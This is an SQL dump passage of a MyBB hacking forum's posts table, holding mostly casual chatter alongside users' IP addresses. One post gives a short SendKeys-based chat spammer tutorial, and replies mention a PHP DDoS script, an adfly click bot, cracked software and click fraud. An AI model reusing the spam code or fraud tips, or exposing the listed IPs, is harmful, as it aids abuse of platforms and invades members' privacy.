`includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4580', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1350194745', 'I will add you to Co-Leader, hopefully jok3r sees this and can give you mod to the forums aswell.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8981ef518852441477006d9ed9d6bdf4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4581', '857', '0', '73', 'another great app on the Ipod', '0', '257', 'XxTREYZxX', '1350199816', 'hey L33T, {THIS IS NOT APART OF MY SERIES} and today i\'m going to show you a great app on the app store. the app is appoday. this great app gives you a free app everyday which you would have to pay. hoped you enjoy this great app. bye L33T.', '203.104.11.12', '-882373876', '1', '0', '257', '1350200386', '1', 'd4cc369d6c8edbe6b44f7c3e74e8f8b9', '0', '1350200386'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4582', '858', '0', '73', 'A new series', '8', '257', 'XxTREYZxX', '1350200278', 'Hey L33T, And today i\'m going to be talking about my new series i\'m going to be doing, its called {THAT GREAT APP}. and i\'m going to be introducing a new great app every day and some basic info about the app. hope you enjoy this series i will finishing this series when there is no great games on the app store. i\'m out XxTREYZxX', '203.104.11.12', '-882373876', '1', '0', '257', '1350200322', '1', '810be92121db65c76d41ba8e6bd599a1', '0', '1350200322'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4583', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '222', 'Exposé', '1350200319', 'I think he meant to say LH....LMAO...simmer down joker', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5242a3d83941438e44f081175a5e1049', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4586', '496', '2408', '14', 'RE: Free Proxy List', '0', '257', 'XxTREYZxX', '1350200973', 'thanks for these they will come in handy hehe lol emailed you.', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', 'e28169faa19fe8752b37e79ff0cd8335', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4585', '496', '2408', '14', 'RE: Free Proxy List', '0', '1', 't3h jok3r', '1350200786', 'Downloaded it now. Using this on my adfly bot. Thanks', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2fcdf9f6d5fff4460ec7227a883d9ef5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4587', '836', '4385', '30', 'RE: Internet Download Manager [IDM] v6.12.22 + crack + skin', '0', '1', 't3h jok3r', '1350201080', 'Thanks sharing and moved to the right section.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '20555fa9f3b6f4396a7c167edc7a3b48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4588', '854', '4510', '7', 'RE: Boasting thread', '0', '53', 'sirchamp', '1350201480', 'perhaps. I did this method before and I got paid out, now Im doing it the second time.', '164.52.9.75', '-1540093621', '1', '0', '0', '0', '1', '2b6abe9b2c0509dcc0cc273cd0d6365d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4589', '854', '4510', '7', 'RE: Boasting thread', '0', '1', 't3h jok3r', '1350201650', 'I\'m sure you are doing delayed clicks otherwise 10K clicks under an hour guarantee ban. Now when it comes to soo many clicks it\'s either bots or a website right?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '078726d770fc04c19d21034439092bac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4590', '841', '4392', '71', 'RE: whats the best game ever made.', '0', '53', 'sirchamp', '1350201733', 'COD!!! All of them. They are great :D', '29.35.13.91', '488836443', '1', '0', '0', '0', '1', '8422f790de470743e50239ad53087387', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4591', '819', '4292', '68', 'RE: PHP DDoS Script', '0', '8', 'spacefish36', '1350201837', 'Coolio thanks for this. I was looking for this for a very long time I even gav up hope lol', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a4bf3608883080be8f5b4f8d4caf240c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4592', '859', '0', '7', 'Absence for 4 days', '0', '53', 'sirchamp', '1350201920', 'Hey guys Today Im going to austria to a wellness hotel for 4 days. So I\'ll be back at wednesday. Have a good time on the forum ^^', '83.141.158.163', '1401790115', '1', '0', '0', '0', '1', 'fb7ca106e489906f5af48d2413b43b5f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4593', '860', '0', '52', '[tut] Creating a chat spammer', '0', '8', 'spacefish36', '1350202099', 'Ever wondered how to create a chat spammer? Find out how today! Start by creating a new “Windows Form Application”. Once you do this, open up the toolbox and drag the following into the form: [list] [*]A Timer [*]2 Buttons [*]1 Textbox [/list] And rearrange them how you please. Open the properties for the button you want to use as the start button and type in the “Text” box, “Start” or “Start Spam”, etc. Then, open the properties for the button you want to use as the stop button and type in the “Text” box, “Stop” or “Stop Spam”, etc. Once this is done, return to the Form. Double click the start button and enter the following: [code] Timer1.Start() [/code] Return to the Form. Double click the stop button and enter the following: [code] Timer1.Stop() [/code] Return to the form. On the bottom of the screen, double click the timer and enter the following code: [code] SendKeys.Send(textBox1.Text) SendKeys.Send(“{ENTER}”) [/code] Now debug and run! You have a chat spammer!!', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8da230e7eedddccb92f56193b54b0a2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4594', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '8', 'spacefish36', '1350202245', '[color=#32CD32][b]What Can You Code:[/b][/color] I\'m pretty new to this. [b][color=#32CD32]Favorite Coding Language:[/color][/b] PHP [color=#32CD32][b]Will You Give Support To Fellow Coders:[/b][/color] Yes, I will try to help others. [color=#32CD32][b]How Many Hours Per Week Can You Be On:[/b][/color] 2 hours a day. [b][color=#32CD32]Age:[/color][/b] 19 [b][color=#32CD32]Proof Of Your Coding Abilities:[/color][/b] http://l33thacking.net/thread-860.html http://l33thacking.net/thread-351.html http://l33thacking.net/thread-508.html', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2c07de8824386fa5700abedaa23cb67e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4595', '859', '4592', '7', 'RE: Absence for 4 days', '0', '8', 'spacefish36', '1350202289', 'I miss you and your posting mayne. Have a safe journey.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3124d0839a5b13c8aa8da1e3420c8ca3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4596', '75', '181', '13', 'RE: ~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '8', 'spacefish36', '1350202439', 'No problem and does anyone like the layout?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '90eb38e827025cc836408f7119929bf9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4597', '730', '3677', '72', 'RE: Need for Speed Most Wanted limited edition', '0', '8', 'spacefish36', '1350202492', 'I loved the first one and I pre-ordered the limited edition one today.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a18f44bda0c82707b67d3390e780f990', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4598', '861', '0', '7', 'L33T Hacking Milestones', '0', '1', 't3h jok3r', '1350203089', 'I thought it would be a great idea to create a thread for LH milestones so everyone knows what my plans and expectations are. [b]Unreached Milestones[/b] [list] [*] [color=#1E90FF]Member of the Big Board Owner group on MyBB Community[/color] [*] 1,000 threads. [*] 300 members [*] 400 members [*] 50 active members [*] 10,000 posts [*] Top 5 rank on forumtopsites.net [*] Minimum 10 threads in each forum on LH [*] Become a well-known website [*] Someone on LH to reach 100 positive rep [*] A pro hacker to begin their journey from LH [*] A full page of l33thacking backlinks when L33thacking searched on Google [/list] [b]Completed[/b] [list] [*] [color=yellow] 5,000 posts[/color] [*] User with at least 20 referrals and at least 2 daily active members [*] 4,000 Posts [*] 100 Members [*] 200 Members [*] 100 Threads [*] 500 Threads [*] 500 Posts [*] 1,000 Posts [*] 10 active Members [/list]', '72.231.24.165', '1223104677', '1', '0', '1', '1350528493', '1', 'f2392d13c62436675905d72061cad348', '0', '1350528493'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4599', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1350205487', 'who are the ten active users just wondering', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'fe226e51620dd8ae0d09e19b554de191', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4600', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '257', 'XxTREYZxX', '1350205685', 'no im going to win haha lol', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '43fe6e9802d528915d436e079dae23c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4601', '859', '4592', '7', 'RE: Absence for 4 days', '0', '257', 'XxTREYZxX', '1350206266', 'have a great holiday and hope your safe going to miss your great post', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'edbd178c7c9af427397f522a0c46ce93', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4602', '841', '4392', '71', 'RE: whats the best game ever made.', '0', '257', 'XxTREYZxX', '1350206491', 'yeah cod is mine too its just a amazing game. ;)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '914bbf47d14d8999800d871de38fe64e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4603', '854', '4510', '7', 'RE: Boasting thread', '0', '53', 'sirchamp', '1350207006', 'No Bots No traffic exchange website. Haha Actually every click came from my computer. You can buy this method. Its worth it.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'bfce7c360655f7997e3094e199a5b3f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4604', '859', '4592', '7', 'RE: Absence for 4 days', '0', '62', 'R?????zo?', '1350214499', 'don\'t forget condoms, heard austria girls are hot :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0072027e180f348c50cdea443061bfe0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4605', '859', '4592', '7', 'RE: Absence for 4 days', '0', '205', 'mothered', '1350216821', 'It\'s good that you\'ve Informed us all. Have a great time :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4ddc385738f805bdb689ec3ac8427cb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4606', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '205', 'mothered', '1350217171', 'Yes, the position Is better than I expected. Voted :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '71c791b6fefd22ff76f8bd19aafc8ce8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4607', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '205', 'mothered', '1350217324', 'I like heavy metal/hard rock. I don\'t mind the occasional rap too.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e19c0d0fc9dfe16d6f660192bbe13f1d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4608', '226', '919', '11', 'RE: A Newbies Guide', '0', '205', 'mothered', '1350217502', 'Great that It\'s stickied. A very good reference point Indeed.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f7b9f63576fa1ae4e44a5cf1f9a4fe99', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4609', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350218431', 'I played all of the Artix\'s games and I remember when dragonfable came out, and all the other ones too. DragonFable was my favorite game of em all. Oh and btw nice guy their', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '7843587afe9321bc927f1659d00b6d85', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4610', '862', '0', '71', 'Mount and Blade 2 BannerLord', '0', '254', 'Greed', '1350218785', 'So this game is gonna being coming out in the near by future. I think It going to be a badass game, if it\'s like mount and blade warband. okay I was going to post the video for it but I can\'t seem to get the button to work. If you guys haven\'t played any of the mount and blade series, I suggest that you do it pretty damn fun. I suggest mount and blade warband because you can run your own kingdom.', '63.153.255.202', '1067057098', '1', '0', '254', '1350218830', '1', '538258154158273592e7dd4bc9beaa82', '0', '1350218830'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4611', '863', '0', '28', 'Hello other Elite people out there', '0', '254', 'Greed', '1350219712', 'Hey, whats up why isn\'t anyone posting here? it seems really cool here maybe you should post here more often so we can do more stuff. Well bye I guess lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'e1e96fc89c67eebd4f1bf413208e26f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4612', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '228', 'VirtualLegend', '1350221422', 'If No ones joins now The People above this Comment have 100% chance to get it next week', '37.74.6.114', '625608306', '1', '0', '0', '0', '1', '7b20e72c95f24812a1ba1afef0c87f00', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4613', '856', '4566', '42', 'RE: Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '254', 'Greed', '1350224523', 'lol it wont happen, just telling yeah', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'e1102473f6dc7b908a37815f685e0659', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4614', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350224839', 'Oh sorry add me on Skype then. Skype: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '570a3eb03acc31cfc7557eae4521a859', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4615', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1350224874', 'Lol. Thanks for the rep :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c73e97c662345dbcae79c092f5fa86ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4616', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '82', 'iTzIpod', '1350224909', 'Yeah. But it got cheaper after a while. Which I don\'t like :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '768ab3e234e9b24b0463804621334541', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4617', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1350224948', 'Okay. Thank you. =] Hoping he approves it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a951df7b037414949db95d2d460b838f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4618', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '82', 'iTzIpod', '1350225019', 'Loool. It\'s actually just a miniature version of HF. Calm yourself...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1173389e3519ab79f4d6fa8758c70d06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4619', '496', '2408', '14', 'RE: Free Proxy List', '0', '82', 'iTzIpod', '1350225059', 't3h jok3r. Give me you Adf.ly bot. -.- I need money too you know?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e66d2f0adb54a91731dcfde594a8c560', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4620', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350225150', 'Me, t3h jok3r, Apathy, Pontaholic (I don\'t know your name sorry :/ ) , Flamingworm, NXK, forgot who else..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e927398a9a4b0716a673854bbcc4b205', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4621', '859', '4592', '7', 'RE: Absence for 4 days', '0', '82', 'iTzIpod', '1350225219', 'Shouldn\'t be in the Announcement Section. Someone move it to the Off Topic Section. Have fun. Stay safe.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1e22704c6b0253b24fd25c63d39aaa7d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4622', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1350225251', 'Voted on my VPNs. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b81a275e6e92ef4a86489903238350d4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4623', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1350225316', 'Guya... I won .. -.- Stop posting.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8016606bc141f170837a10e52bb5f854', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4624', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1350225349', 'Hip Hop + Rap is kinda dying.... -.- Ugly music nowadays..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b26ca0366675a3e56eafaacd646e2700', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4625', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350225388', 'Thanks :p Although it sucks :/ Lool It\'s weak.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ede686329eadc5075a566241ec12625f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4626', '704', '3616', '66', 'RE: Minecraft Accounts', '0', '254', 'Greed', '1350226523', 'Hey I would like one, so ima just pm you in a sec lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '8d0dbf2091e92c13a6c88e191d69f6c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4627', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350226680', 'hey I\'m like lvl 10 or something lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'a551ba3e11442987939cb62003e3d1c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4628', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350228893', 'On AdventureQuest Worlds?? Really? O_o Lol.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d87cd469daf5033d268fef61cd7989f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4629', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '62', 'R?????zo?', '1350228928', 'That\'s true, they all rap about their ex, current girlfriend, drugs and money.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '46b5d92b1a10449c8a3674f5fb1ac776', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, 